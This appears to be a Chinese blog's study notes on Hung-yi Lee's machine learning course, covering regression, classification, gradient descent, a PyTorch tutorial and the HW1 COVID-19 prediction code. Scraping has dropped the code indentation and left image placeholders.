    对于如图上的训练集,给出测试集 $\begin{bmatrix}1\1\end{bmatrix}$,使用朴素贝叶斯分类器得到的结果是类别 2,这与直觉相悖。

    png

    • Benefit of generative model 概率模型的优点
      • With the assumption of probability distribution,less training data is needed
        • 在概率分布的假设下,需要的训练数据较少。
      • With the assumption of probability distributionmore robust to the noise
        • 在概率分布的假设下,对噪声更加稳健。
      • Priors and class-dependent probabilities can beestimated from different sources.
        • 可以从不同的来源估算出优先权和依赖类的概率。

    png

    png

    对于更多类别,使用 Softmax 操作得到概率分布。

    Softmax 的公式得到了数学证明。

    png

    Logistic Regression 的局限性——难以解决异或问题。

    png

    因为你无法找到一个直线划分它们。

    png

    解决方法:特征转移。如将 $x1’$: 点到 $\begin{bmatrix}0\0\end{bmatrix}$ 的距离,$x2’$: 点到 $\begin{bmatrix}1\1\end{bmatrix}$ 的距离,此时经过转换后的数据便可以用一条直线划分。

    但是找到这种特征转移函数并不是件易事。

    png

    通过在分类感知器前面再加上一些神经元以便特征转移。

    png

    此时便找到了一个方法使用 Logistic Regression 解决异或问题。

    png

    我们把这种方法总结起来就是个神经网络,也可以叫它 Deep Learning。

    HW1

    Download data

    https://www.kaggle.com/competitions/ml2022spring-hw1 获取数据集 covid.train.csvcovid.test.csv

    Import packages

    # 数值运算
    import math
    import numpy as np
    # 读写数据
    import pandas as pd
    import os
    import csv
    # 进度条
    from tqdm import tqdm
    # Pytorch
    import torch
    import torch.nn as nn
    from torch.utils.data import Dataset, DataLoader, random_split
    # 绘制学习曲线
    from torch.utils.tensorboard import SummaryWriter

    Some Utility Functions

    You do not need to modify this part.

    def same_seed(seed): 
    """
    Fixes random number generator seeds for reproducibility.
    修正随机数种子以保证结果可重复性。
    """
    torch.backends.cudnn.deterministic = True
    torch.backends.cudnn.benchmark = False
    np.random.seed(seed)
    torch.manual_seed(seed)
    if torch.cuda.is_available():
    torch.cuda.manual_seed_all(seed)


    def train_valid_split(data_set, valid_ratio, seed):
    """
    Split provided training data into training set and validation set
    将提供的训练数据分成训练集和验证集,返回 numpy.array 形式
    """
    valid_set_size = int(valid_ratio * len(data_set))
    train_set_size = len(data_set) - valid_set_size
    train_set, valid_set = random_split(data_set,
    [train_set_size, valid_set_size],
    generator=torch.Generator().manual_seed(seed))
    return np.array(train_set), np.array(valid_set)


    def predict(test_loader, model, device):
    model.eval() # Set your model to evaluation mode. 将你的模型设置为评估模式。
    preds = []
    for x in tqdm(test_loader):
    x = x.to(device)
    with torch.no_grad():
    pred = model(x)
    preds.append(pred.detach().cpu())
    preds = torch.cat(preds, dim=0).numpy()
    return preds

    Dataset

    class COVID19Dataset(Dataset):
    """
    x: 特征
    y: 目标,如果为空,则做预测
    """
    def __init__(self, x, y=None):
    if y is None:
    self.y = y
    else:
    self.y = torch.FloatTensor(y) # 将数据集由 np.array 转成 torch.tensor 形式
    self.x = torch.FloatTensor(x)


    def __getitem__(self, idx):
    """
    根据索引返回数据
    """
    if self.y is None:
    return self.x[idx]
    else:
    return self.x[idx], self.y[idx]


    def __len__(self):
    return len(self.x)

    Neural Network Model

    通过修改下面的类,尝试不同的模型架构。

    class My_Model(nn.Module):
    def __init__(self, input_dim):
    super(My_Model, self).__init__() # 调用父类 nn.Module 的 __init__
    # TODO: 修改模型的结构,注意维度。
    # 定义 lyaers 变量,构造神经网络结构
    self.layers = nn.Sequential(
    nn.Linear(input_dim, 16),
    nn.ReLU(), # 激活函数:ReLU
    nn.Linear(16, 8), # 输入特征数 16,输出特征数 8
    nn.ReLU(),
    nn.Linear(8, 1) # # 输入特征数 8,输出特征数 1(回归问题)
    )


    def forward(self, x):
    x = self.layers(x)
    x = x.squeeze(1) # 对数组维度进行压缩 (B, 1) -> (B)
    return x

    Feature Selection

    通过修改下面的函数,选择你认为有用的特征。

    def select_feat(train_data, valid_data, test_data,
    select_all=True):
    """
    选择有用的特征来进行回归。
    """
    y_train, y_valid = train_data[:, -1], valid_data[:, -1]
    raw_x_train, raw_x_valid, raw_x_test = train_data[:, :-1], valid_data[:, :-1], test_data

    if select_all:
    feat_idx = list(range(raw_x_train.shape[1]))
    else:
    feat_idx = [0, 1, 2, 3, 4] # TODO: 选择合适的特征列

    return raw_x_train[:, feat_idx], raw_x_valid[:, feat_idx], raw_x_test[:, feat_idx], \
    y_train, y_valid

    Training Loop

    def trainer(train_loader, valid_loader, model, config, device):
    # 定义损失函数
    criterion = nn.MSELoss(reduction='mean')
    # 定义优化函数
    # TODO: 访问 Please check https://pytorch.org/docs/stable/optim.html 了解更多可用函数
    # TODO: L2 正则化,或自行实现
    optimizer = torch.optim.SGD(model.parameters(), lr=config['learning_rate'], momentum=0.9)

    writer = SummaryWriter() # 可视化工具 tensorboard

    if not os.path.isdir('./models'):
    os.mkdir('./models') # 新建一个文件夹以保存模型

    n_epochs, best_loss, step, early_stop_count = config['n_epochs'], math.inf, 0, 0

    for epoch in range(n_epochs):
    model.train() # 将你的模型设为训练模式
    loss_record = []

    # tqdm 是一个可视化训练进度的包
    train_pbar = tqdm(train_loader, position=0, leave=True)

    for x, y in train_pbar:
    optimizer.zero_grad() # 将梯度设为 0
    x, y = x.to(device), y.to(device) # 将数据读入设备
    pred = model(x)
    loss = criterion(pred, y)
    loss.backward() # 计算梯度(backpropagation 方法)
    optimizer.step() # 更新参数
    step += 1
    loss_record.append(loss.detach().item())

    # 在进度条显示当前 epoch 次数和损失函数的值
    train_pbar.set_description(f'Epoch [{epoch+1} / {n_epochs}]')
    train_pbar.set_postfix({'loss': loss.detach().item()})

    mean_train_loss = sum(loss_record) / len(loss_record)
    writer.add_scalar('Loss/train', mean_train_loss, step)

    model.eval() # 将你的模型设为评估模式
    loss_record = []
    for x, y in valid_loader:
    x, y = x.to(device), y.to(device)
    with torch.no_grad():
    pred = model(x)
    loss = criterion(pred, y)

    loss_record.append(loss.item())

    mean_valid_loss = sum(loss_record) / len(loss_record)
    print(f'Epoch [{epoch + 1} / {n_epochs}]: Train loss: {mean_train_loss: .4f},\
    Valid loss: {mean_valid_loss: .4f}')
    writer.add_scalar('Loss/valid', mean_valid_loss, step)

    if mean_valid_loss < best_loss:
    best_loss = mean_valid_loss
    torch.save(model.state_dict(), config['save_path']) # 保存你最好的模型
    print('Saving model with loss {:.3f}...'.format(best_loss))
    early_stop_count = 0
    else:
    early_stop_count += 1

    if early_stop_count >= config['early_stop']:
    # 模型没有改善,所以我们停止了训练
    print('\nModel is not improving, so we halt the training session.')
    return

    Configurations

    配置

    config 包含了 超参数 和 模型保存路径。

    device = 'cuda' if torch.cuda.is_available() else 'cpu'
    config = {
    'seed': 5201314, # 随机数种子
    'select_all': True, # 是否使用所有特征
    'valid_ratio': 0.2, # 验证集大小 = 训练集大小 * valid_ratio
    'n_epochs': 3000, # epoch 数量
    'batch_size': 256, # batch 大小
    'learning_rate': 1e-5, # 学习率
    'early_stop': 400, # 如果模型训练在这么多次尝试后都没有得到改善,停止训练。
    'save_path': './models/model.ckpt' # 模型保存路径
    }

    Dataloader

    Read data from files and set up training, validation, and testing sets. You do not need to modify this part.

    # Set seed for reproducibility
    same_seed(config['seed'])

    # train_data size: 2699 x 118 (id + 37states + 16 features x 5 days)
    # test_data size: 1078 x 117 (without last day's positive rate)
    train_data, test_data = pd.read_csv('./covid.train.csv').values,\
    pd.read_csv('./covid.test.csv').values
    train_data, valid_data = train_valid_split(train_data,
    config['valid_ratio'],
    config['seed'])

    # Print out the data size.
    print(f"""train_data size: {train_data.shape}
    valid_data size: {valid_data.shape}
    test_data size: {test_data.shape}""")

    # Select features
    x_train, x_valid, x_test, y_train, y_valid = select_feat(train_data,
    valid_data,
    test_data,
    config['select_all'])

    # Print out the number of features.
    print(f'number of features: {x_train.shape[1]}')

    train_dataset, valid_dataset, test_dataset = COVID19Dataset(x_train, y_train), \
    COVID19Dataset(x_valid, y_valid), \
    COVID19Dataset(x_test)

    # Pytorch data loader loads pytorch dataset into batches.
    train_loader = DataLoader(train_dataset, batch_size=config['batch_size'],
    shuffle=True,
    pin_memory=True)
    valid_loader = DataLoader(valid_dataset, batch_size=config['batch_size'],
    shuffle=True,
    pin_memory=True)
    test_loader = DataLoader(test_dataset, batch_size=config['batch_size'],
    shuffle=False,
    pin_memory=True)
    train_data size: (2160, 118) valid_data size: (539, 118) test_data size: (1078, 117)number of features: 117

    Start training!

    # put your model and data on the same computation device.
    # 把你的模型和数据放在同一个计算设备上。
    model = My_Model(input_dim=x_train.shape[1]).to(device)
    trainer(train_loader, valid_loader, model, config, device)

    Plot learning curves with tensorboard (optional)

    可视化训练结果。

    tensorboard is a tool that allows you to visualize your training progress.

    If this block does not display your learning curve, please wait for few minutes, and re-run this block. It might take some time to load your logging information.

    %reload_ext tensorboard
    %tensorboard --logdir=./runs/

    此处会在 Jupyter Nodebook 中显示 tensorboard

    Testing

    The predictions of your model on testing set will be stored at pred.csv.

    def save_pred(preds, file):
    ''' Save predictions to specified file '''
    with open(file, 'w') as fp:
    writer = csv.writer(fp)
    writer.writerow(['id', 'tested_positive'])
    for i, p in enumerate(preds):
    writer.writerow([i, p])

    model = My_Model(input_dim=x_train.shape[1]).to(device)
    model.load_state_dict(torch.load(config['save_path']))
    preds = predict(test_loader, model, device)
    save_pred(preds, 'pred.csv')
    100%|██████████| 5/5 [00:00<00:00, 500.02it/s]
    ]]>
    + Preparation

    ##【機器學習 2021】預測本頻道觀看人數 -上- - 機器學習基本概念簡介

    什么是机器学习

    png

    Machine Learning ≈ Look for Function 让机器具备找函数的能力

    • Speech Recognition 语音辨识
    • Image Recognition 图像识别
    • Playing Go 下围棋

    机器学习的各个领域

    png

    • Regression 回归,如接受今日 PM 2.5,气温和臭氧含量作为参数,以明日 PM2.5 作为输出
      • The function outputs a scalar. 该函数输出一个标量。
    • Classification 分类,如判断收到的邮件是否为垃圾邮件。
      • Given options (classes), the function outputsthe correct one. 给出选项(类),该函数输出正确的选项。

    png

    ​ 如下围棋就是一个分类问题,将围棋的每个坐标当作一个类来看。

    png

    回归分类只是机器学习中的一小部分,还有结构化学习 Structured Learning,输入和输出都是具有结构化的对象(数列、列表、树、边界框等)。

    举例:预测本频道观看人数

    png

    ​ 找到一个函数用于描述某天本频道观看人数。

    1.Function with Unknown Parameters

    png

    ​ 我们假设某天本频道观看人数 $y$ 与其前一天本频道观看人数 $x_1$ 有关,且满足关系式 $y = b + wx_1$。

    ​ 参数 $w$ 和 $b$ 都是未知的,要从数据中学习得出。

    2.Define Loss from Training Data

    png

    损失函数 $L(b, w)$ 是一个含有参数 $w$ 和 $b$ 的函数,用于衡量参数 $w$ 和 $b$ 的取值有多好。

    $$Loss: L = \frac{1}{N}\sum_ne_n$$

    $y$ 表示预测值,$\hat y$ 表示实际值,$e$ 表示误差

    • 如果 $e=|y-\hat y|$,则 $L$ 为平均绝对值误差(MAE)
    • 如果 $e=(y-\hat y)^2$,则 $L$ 为均方误差(MSE)

    如果 $y$ 和 $\hat y$ 都是概率分布,则用交叉熵损失函数(Cross-entropy)

    3.Optimization

    $$w*,b*=arg\min_{w, b}L$$

    ​ 找到使 $L$ 值最小时 $w$ 和 $b$ 的取值。

    png

    先考虑只有参数 $w$ 的情况:

    $$w^*=arg\min_w L$$

    使用梯度下降方法:

    -(随机)挑选一个初始值 $w^0$

    • 计算 $L$ 对 $w$ 的导数 $\frac{\partial L}{\partial w}|_{w=w^0}$

    • 迭代更新 $w$,$w^1\leftarrow w^0 - {\color{Red} \eta } \frac{\partial L}{\partial w}|_{w=w^0}$

      • 其中 ${\color{Red} \eta }$ 被称为学习率(learning rate),这是由用户自行设定的。
        • 由用户自行设定的参数被称为超参数(hypermeters)

    ​ 梯度下降方法只能找到 $L$ 的极小值(local minima)而不是最小值(global minima),但这不是梯度下降方法最大的问题。

    ​ 为什么不采用暴力搜索的方法查找最小值?如果参数过多,暴力搜索的方法就无法实现了,只能采用梯度下降方法。

    png

    ​ 对于多个参数 $w$ 和 $b$,原理相同。

    ​ 至于求导,可以由深度学习框架自行解决。

    ​ 何时停止迭代?当算得的梯度为 0 或者人为终止迭代。

    $$\bigtriangledown L = \begin{bmatrix}
    \frac{\partial L}{\partial w} \
    \frac{\partial L}{\partial b}
    \end{bmatrix}_{\mathrm{gradient}}$$

    因而得名梯度下降。

    png

    ​ 随着迭代次数增加,$L$ 值逐渐减小。

    ​ 在这个示意图中,红色表示 $L$ 值较大,蓝色表示 $L$ 值较小。

    总结

    png

    ​ 最后的训练好的模型中 $w*=0.97$,$b=0.1k。$对于训练集(2017-2020 中各天本频道观看人数):$L(w^, b^*)=0.48k$。

    ​ 而对于训练时未用到的数据(2021 中各天本频道观看人数),$L’=0.58k$。

    png

    ​ 训练好的模型只是简单地认为当日的本频道观看人数与前一日本频道观看人数有关,而从实际情况可以看出,本频道观看人数似乎有一定的周期性,如一周的周末中本频道观看人数较少。

    png

    ​ 调整模型,如 $y=b+\sum^7_{j=1}w_jx_j$,就考虑本频道观看人数情况与前一周的本频道观看人数情况有关,此时 $L$ 和 $L’$ 都有所下降。

    ​ 若 $y=b+\sum^{28}_{j=1}w_jx_j$,则 $L$ 和 $L’$ 又有所下降。

    ​ 而当 $y=b+\sum^{56}_{j=1}w_jx_j$ 时,$L$ 和 $L’$ 不再下降,说明再扩大天数并不能更好地优化模型了。

    ##【機器學習 2021】預測本頻道觀看人數 -下- - 深度學習基本概念簡介

    1.Function with Unknown Parameters

    png

    ​ 也许**线性模型(Linear models)**太过简单,我们需要更复杂的模型。如图所示,如果真实模型像红色折线的那样,则你无论怎么训练线性模型,都无法很好地拟合真实情况。

    Model Bias 一般是由于模型设计太过简单,此时再进行训练也无法找到更好的参数来使 $L$ 降低。

    png

    ​ 我们可以将这个红色折线由一个常数和若干个 Hard Sigmoid 函数之和来表示:$y=b+\sum_ic_i\mathrm{sigmoid}(b_i+w_ix_1)$。

    png

    ​ 任何折线都可以用这种形式来表示,只要 Hard Sigmoid 函数管够就行。

    ​ Sigmoid 函数的个数?由用户自行设定,这也是一个 hypermeters。

    png

    ​ 用片状线性曲线近似连续曲线。为了有好的近似,我们需要足够的片断。

    png

    ​ 一般用 Soft Sigmoid 函数(往往称为 Sigmoid 函数)去逼近这个 Hard Sigmoid 函数。

    Sigmoid 函数:$y=c\frac{1}{1+e^{-(b+wx_1)}}=c\mathrm{sigmoid}(b+wx_1)$

    png

    • 不同的 $w$ 会修改 Sigmoid 函数的坡度

    • 不同的 $b$ 会平移 Sigmoid 函数

    • 不同的 $c$ 会修改 Simoid 函数的高度

    png

    ​ 这样我们就得到了一个具有更多特征的新的回归模型:$y=b+\sum_ic_i\mathrm{sigmoid}\left(b_i+\sum_jw_ijx_j\right)$

    png

    • $i$ 表示 Sigmoid 函数的序号
    • $j$ 表示特征的序号
    • $w_{ij}$ 表示第 $i$ 个 Sigmoid 函数第 $x_j$ 的权重

    png

    ​ 再通过激活函数和相加后得到最后的回归模型 $y$。

    png

    ​ 这个表达式可以用向量乘法简单表示。

    png

    ​ 将所有参数拉长变成一个向量 $\theta$。

    2.Define Loss from Training Data

    ​ 损失函数 $L$ 与之前没有什么变化,但是由于参数变多,用 $L(\theta)$ 表示。

    png

    3.Optimization

    png

    png

    ​ 现在问题变为 $\mathbf{\theta}^*=arg\min_\theta L$,方法与之前类似,只不过参数变多了。

    ​ 用 $\mathbf{g}$ 对各个参数的导数总和作简写。

    png

    ​ 由于参数量过多,要把数据集分成多个 batch 来更新参数 $\mathbf{\theta}^*$。一次计算完所有数据集的迭代过程称为 epoch

    png

    ​ 举例:

    • 如果有 10000 个数据,Batch 的大小为 10,则一次 epoch 需要更新 1000 次参数。
    • 如果有 1000 个数据,Batch 的大小为 100,则一次 epoch 需要更新 10 次参数。

    Batch 的大小也是一个 hypermeters。

    png

    ​ 也可以用两个 ReLU 叠加起来来代替 Sigmoid 函数来逼近 Hard Sigmoid 函数。

    png

    ​ 我们把这种函数称之为激活函数,一般来说 ReLU 会比 Sigmoid 效果更好些。

    png

    ​ 我们用多个 ReLU 来逼近最终的回归曲线,可以看到随着 ReLU 的个数增多,$L$ 的值有所下降。

    png

    ​ 我们也可以进行多次这种计算,形成深度神经网络

    png

    ​ 3 层神经网络的预测结果,由于模型中并没有考虑春节的因素,在春节前后误差较大。

    png

    ​ 给所接触到的东西作一个统一的命名。

    png

    ​ 随着时代的发展,神经网络的层数越来越多,准确率越来越好。

    Residual Net 并不是简单的 Fully Connected Network,使用了 Special structure,不然很可能会过拟合。

    png

    ​ 神经网络的层数并不是越多越好,过多的层数可能会出现过拟合的现象。

    Class Material

    ##【機器學習 2022】開學囉- 又要週更了-

    机器学习课程速览

    ​ This course focuses on Deep Learning.

    png

    ​ 在机器学习中,输入的数据可以是向量矩阵(如图像)、序列(如语音,文本),输出的数据可以是标量(回归)、类别(分类)、文本、图像等。

    教机器的种种方法

    • HW1:COVID-19 Case Prediction 新冠感染人数预测
      • 输入向量、输出标量
    • HW2:Phoneme Classification 因素分类
      • 输入向量、输出类别
    • HW3:Image Classification 图像分类
      • 输入矩阵、输出类别
    • HW4:Speaker Classification 说话者分类
      • 输入序列、输出类别
    • HW5:Machine Translation 机器翻译
      • 输入序列、输出文本
    • HW6:动漫脸谱生成

    Lecture 1 - 5 有监督学习

    png

    课程 1-5 属于有监督学习,以给一张图片,让机器分类是宝可梦还是数码宝贝为例,训练集需要有对应的标签。

    Lecture 7 自监督学习

    png

    ​ 要在深度神经网络中应用监督学习,我们需要足够的标记数据。但是人工手动标记数据既耗时又昂贵。对于一些特殊的领域,比如医学领域获取足够的数据本身就是一个挑战。因此,监督学习当前的主要瓶颈是标签生成和标注。

    自监督学习是通过以下方式将无监督问题转化为有监督问题的方法。

    png

    预训练模型 Pre-trained Model(基础模型 Foundation Model) 之于 下游模型 Downstream Tasks 相当于 操作系统 之于 应用。

    ​ AI 专家将大模型统一命名为 Foundation Models,可以翻译为基础模型或者是基石模型。

    Lecture 6 GAN

    png

    GAN:是训练集的输入 $x$ 和输出 $y$ 不必配对地出现。

    png

    常见领域:

    Lecture 12 强化学习

    png

    ​ 在人也不能确定最优解时——强化学习

    进阶课题——不只是追求正确率

    Lecture 8 异常检测

    png

    ​ 让机器在能识别这个图像是宝可梦还是神奇宝贝的同时,还能识别异常图片,返回”I don’t know“。

    Lecture 9 Explainable AI

    png

    ​ 让机器知其然还要知其所以然。

    png

    ​ 举例,在机器判别图片是宝可梦还是神奇宝贝的过程中,将其判别的主要依据用特定的记号标记,然而判别的主要依据不在生物本身上?

    png

    ​ 最后发现原因:宝可梦的所有图片都是 PNG 格式,而大多数数码宝贝的图片是 JPEG 格式。机器根据背景颜色区分宝可梦和数码宝贝。

    Lecture 10 Model Attack

    png

    ​ 往图片中一定的噪音,可能会出现截然不同的判别结果。

    攻防问题

    • 攻:通过加入某些噪音破坏判别结果
    • 防:防止某些噪音破坏判别结果

    Lecture 11 领域适应性

    png

    ​ 在黑白图像中训练好的模型,在黑白图像里测试准确率好,但在彩色图像中准确率差。

    Lecture 神经网络压缩

    png

    ​ 在资源受限的环境中部署 ML 模型。

    Lecture 14Life-long Learning

    png

    ​ Life-long Learning 的目标,让机器能解决各种问题。

    学习如何学习

    Lecture 15 元学习

    png

    ​ 少量的学习通常是通过元学习实现的。让机器自己找到一个机器学习的算法。

    ML 2022 PyTorch Tutorial 1

    安装 pytorch

    按照官方的方法是从官网 PyTorch 安装 pytorch 环境,但这在国内下载真的好慢……

    png

    鼓捣了老半天觉得用离线安装的方式比较好 orz

    从镜像站 https://download.pytorch.org/whl/torch_stable.html 下载对应版本的torchtorchvision

    下载了 cu117/torch-1.13.1%2Bcu117-cp39-cp39-win_amd64.whl cu117/torchvision-0.14.1%2Bcu117-cp39-cp39-win_amd64.whl

    在下载到的目录进入 cmd 使用pip install torch-l.13.1+cul17-cp39-cp39-win amd64.whlpip install torchvision-0.14.1+cu117-cp39-cp39-win amd64.whl安装。

    在 python 中验证:

    1
    2
    3
    4
    import torch

    print(torch.__version__)
    print(torch.cuda.is_available()) # cuda 显卡是否可以使用
    1
    2
    1.13.1+cu117
    True

    Training Neural Networks

    训练神经网络的步骤:

    • 定义神经网络结构,定义损失函数,定义优化算法
    • 训练

    Training & Testing Neural Networks

    在训练模型中使用训练集 Training 和 验证集 Validation,测试模型时使用 Testing。

    Training & Testing Neural Networks - in Pytorch

    Step 1.torch.utils.data.Dataset & torch.utils.data.DataLoader

    Dataset & Dataloader

    DataSet: 存储数据样本 $x$ 和预期值 $y$

    Dataloader: 对数据进行分批分组 groups data in batches,实现多任务处理

    1
    2
    dataset = MyData(file)
    dataloader = DataLoader(dataset, batch_size, shuffle=True)

    机器学习,深度学习模型训练阶段的 Shuffle 重要么?为什么?_技术宅 zch 的博客-CSDN 博客_深度学习 shuffle

    • 对于 Training 和 Validation,需要打乱,shuffle=True
    • 对于 Testing,不需要打乱,shuffle=False

    如下列代码就将数据集分成 5 给 batch:

    1
    2
    dataset = MyDataset(file)
    dataloader = DataLoader(dataset, batch_size=5, shuffle=False)

    png

    设计一个 MyDataset 类用于管理数据集:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    from torch.utils.data import Dataset, DataLoader


    class MyDataset(Dataset):
    def __init__(self, file):
    """读取数据并初始化"""
    self.data = ...


    def __getitem__(self, index):
    """返回一个数据"""
    return self.data[index]


    def __len__(self):
    """返回数据集的大小"""
    return len(self.data)
    Tensors

    pytorch 中的 Tensors 就是高维数组,相当于 numpy 中的 array

    dim in PyTorch == axis in NumPy

    创建 tensor
    • 直接填入数据,list 或 numpy.ndarray
    1
    x = torch.tensor([[1, -1], [-1, 1]])
    1
    x = torch.from_numpy(np.array([[1, -1], [-1, 1]]))
    • 输入形状,填入 0 或 1
    1
    x = torch.zeros([2, 2])
    1
    x = torch.ones([1, 2, 5])
    常见运算符
    • 加法
    1
    z = x + y
    • 减法
    1
    z = x - y
    • 乘方
    1
    y = x.pow(2)
    • 求和
    1
    y = x.sum()
    • 均值
    1
    y = x.mean()
    • 转置
    1
    x = x.transpose(0, 1)
    • Squeeze 移出某个维度

    png

    • Unsqueeze 添加某个维度

    png

    • Cat 拼接数组

    png

    PyTorch v.s. Numpy

    数据类型:

    Data typedtypetensor
    32-bit floating pointtorch.floattorch.FloatTensor
    64-bit integer (signed)torch.longtorch.LongTensor
    PyTorchNumpy
    x.shapex.shape
    x.dtypex.dtype
    x.reshape / x.viewx.reshape
    x.squeeze()x.squeeze()
    x.unsqueeze(1)np.expand_dims(x, 1)
    Device

    自行选择 CPU 或 Cuda 对 Tensors 进行运算。

    CPU

    1
    x = x.to(‘cpu’)

    GPU

    1
    x = x.to(‘cuda’)
    计算梯度

    定义 $x$,并事先告知需要计算梯度 requires_grad=True

    $$x=\begin{bmatrix}1 & 0 \ -1 & 1\end{bmatrix}$$

    1
    x = torch.tensor([[1., 0.], [-1., 1.]], requires_grad=True)

    $$z=\sum_i\sum_j x^2_{i,j}$$

    1
    z = x.pow(2).sum()

    求导

    $$\frac{\partial z}{\partial x_{i,j}}=2x_{i,j}$$

    1
    z.backward()

    得到 $x$ 的梯度

    $$\frac{\partial z}{\partial x}=\begin{bmatrix}2&0\-2&2\end{bmatrix}$$

    1
    x.grad
    1
    tensor([[ 2., 0.], [-2., 2.]])

    Step 2.torch.nn.Module

    • 全连接层
    1
    layer = torch.nn.Linear(32, 64)
    • 激活函数
    1
    2
    nn.Sigmoid()
    nn.ReLU()

    将定义的神经网络模型放在MyModel类中:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    import torch.nn as nn
    class MyModel(nn.Module):
    def __init__(self):
    """初始化你的模型,定义神经网络层"""
    super(MyModel, self).__init__()
    self.net = nn.Sequential(
    nn.Linear(10, 32),
    nn.Sigmoid(),
    nn.Linear(32, 1)
    )


    def forward(self, x):
    """计算你的 NN 的输出"""
    return self.net(x)

    可以不使用nn.Sequential,效果与下面的代码作用一致

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    import torch.nn as nn

    class MyModel(nn.Module):
    def __init__(self):
    super(MyModel, self).__init__()
    self.layer1 = nn.Linear(10, 32)
    self.layer2 = nn.Sigmoid(),
    self.layer3 = nn.Linear(32,1)


    def forward(self, x):
    out = self.layer1(x)
    out = self.layer2(out)
    out = self.layer3(out)
    return out

    Step 3.torch.nn.MSELoss torch.nn.CrossEntropyLoss etc.

    定义损失函数

    • MSE
    1
    criterion = nn.MSELoss()
    • 交叉熵损失函数
    1
    criterion = nn.CrossEntropyLoss()
    • 输入预测值和实际值计算 loss
    1
    loss = criterion(model_output, expected_value)

    Step 4.torch.optim

    找到一个函数以减少 loss 的值,如 随机梯度下降法 Stochastic Gradient Descent (SGD)

    1
    torch.optim.SGD(model.parameters(), lr, momentum = 0)

    Step 5.Entire Procedure

    Neural Network Training Setup

    完整流程:读取数据-分割数据-定义模型-定义损失函数-定义优化函数

    1
    2
    3
    4
    5
    dataset = MyDataset(file)
    tr_set = DataLoader(dataset, 16, shuffle=True)
    model = MyModel().to(device)
    criterion = nn.MSELoss()
    optimizer = torch.optim.SGD(model.parameters(), 0.1)
    Neural Network Training Loop

    训练过程:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    for epoch in range(n_epochs):  # 进行一个 epoch
    model.train() # 将模型设为 train 模式
    for x, y in tr_set: # 从 dataloader 中读入 x, y
    optimizer.zero_grad() # 将梯度设为 0
    x, y = x.to(device), y.to(device) # 将数据放入设备(CPU/Cuda)
    pred = model(x) # 前向传播(得到输出值)
    loss = criterion(pred, y) # 计算 loss
    loss.backward() # 计算梯度(backpropagation)
    optimizer.step() # 优化参数
    Neural Network Validation Loop

    上接上面的 epoch 循环:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    model.eval()  # 将模型设为 evaluation 模式
    total_loss = 0 # 初始化 loss
    for x, y in dv_set: # 从 dataloader 中读入 x, y
    x, y = x.to(device), y.to(device) # 将数据放入设备(CPU/Cuda)
    with torch.no_grad(): # 禁用梯度计算
    pred = model(x) # 计算输出值 pred
    loss = criterion(pred, y) # 计算 loss
    total_loss += loss.cpu().item() * len(x) # 将所有 loss 加到一起
    avg_loss = total_loss / len(dv_set.dataset) # 计算平均 loss
    Neural Network Testing Loop
    1
    2
    3
    4
    5
    6
    7
    model.eval()  # 将模型设为 evaluation 模式
    preds = [] # 定义一个列表存储预测值
    for x in tt_set: # 从 dataloader 中读入 x
    x = x.to(device) # 将数据放入设备(CPU/Cuda)
    with torch.no_grad(): # 禁用梯度计算
    pred = model(x) # 计算输出值 pred,即预测结果
    preds.append(pred.cpu()) # 生成预测结果
    Notice - model.eval(), torch.no_grad()
    • model.eval() 改变一些模型层的行为,如 dropout 和 batch normalization。
    • with torch.no_grad()防止计算结果被添加到梯度计算的图。通常用于防止在验证/测试数据上的意外训练。
    存/读 训练模型
    • Save
    1
    torch.save(model.state_dict(), path)
    • Load
    1
    2
    ckpt = torch.load(path)  # 保存文件路径
    model.load_state_dict(ckpt) # 保存 ckpt 文件

    More About PyTorch

    • torchaudio
      • speech/audio processing
    • torchtext
    • natural language processing
    • torchvision
      • computer vision
    • skorch
      • scikit-learn + pyTorch
    • Useful github repositories using PyTorch
      • Huggingface Transformers (transformer models: BERT, GPT, …)
      • Fairseq (sequence modeling for NLP & speech)
      • ESPnet (speech recognition, translation, synthesis, …)
      • Most implementations of recent deep learning papers

    Extra Material

    Introduction of Deep Learning

    png

    Deep Learning 使用次数越来越频繁。

    png

    Deep Learning 的历史:

    • 1958: Perceptron (linear model) 线性感知机
    • 1969: Perceptron has limitation 线性感知机有明显的局限性,如不能处理异或问题
    • 1980s: Multi-layer perceptron 多层感知机
      • Do not have significant difference from DNN today 与当今深度神经网络并无明显差别
    • 1986: Backpropagation 反向传播
      • Usually more than 3hidden layers is not helpful 多余 3 层的隐藏层并没有明显效果
    • 1989: 1hidden layer is “good enough”, why deep? 1 层隐藏层即可,为什么要多层?
    • 2006: RBM initialization (breakthrough) 受限玻尔兹曼机(RBM)学习 - 知乎 (zhihu.com)
    • 2009: GPU 显卡加速神经网络的训练速度
    • 2011: Start to be popular in speech recognition 在语音识别中效果显著
    • 2012: win ILSVRC image competition 赢得 ILSVRS 图像识别比赛

    png

    Deep Learning 的步骤与传统机器学习方法类似:

    • Step 1:define a setof function 在 Deep Learning 中为设置神经网络的结构
    • Step 2:goodness offunction
    • Step 3: pickthe bestfunction

    png

    png

    在神经网络前向传播的过程中其实就是一系列矩阵运算,因此使用 GPU 速度比 CPU 要更快。

    png

    神经网络的隐藏层就相当于传统机器学习方法中 Feature extractor replacingfeature engineering 的过程。

    如果是一个分类问题,在输出层要进行 Softmax 操作,输出期望值最高的类别。

    png

    对于手写体数字识别,输出的是一个向量,值最高的就是输出的类别。

    png

    此时神经网络中的隐藏层就是一个手写体数字识别函数集。你设定一个好的神经网络结构,以拟合出一个好的函数。

    png

    Q: 设置神经网络需要多少层?每层需要多少神经元?

    A: 需要开发者的不断试错和直觉。

    Q: 我们可以让机器来自动设计神经网络吗?

    A: 如 [Evolutionary Artificial Neural Networks (researchgate.net)](https://www.researchgate.net/publication/2861461_Evolutionary_Artificial_Neural_Networks#:~:text=Evolutionary artificial neural networks (EANNs) refer to a,(GAs)%2C evolutionary programming (EP)%2C or other evolutionary algorithms.),但是没有那么通用

    Q: 其他形状的神经网络结构?

    A: 如卷积神经网络

    png

    定义损失函数,由于 $y$ 和 $\hat y$ 都是概率分布,使用交叉熵损失函数(Cross-entropy)

    $$C(y,\hat y)=-\sum^{10}_{i=1}\hat{y_i}\ln y_i$$

    png

    最终的损失函数表示为 $L=\sumN_{n=1}Cn$,目标就是通过调整隐藏层中的参数使 $L$ 取得最小值。

    png

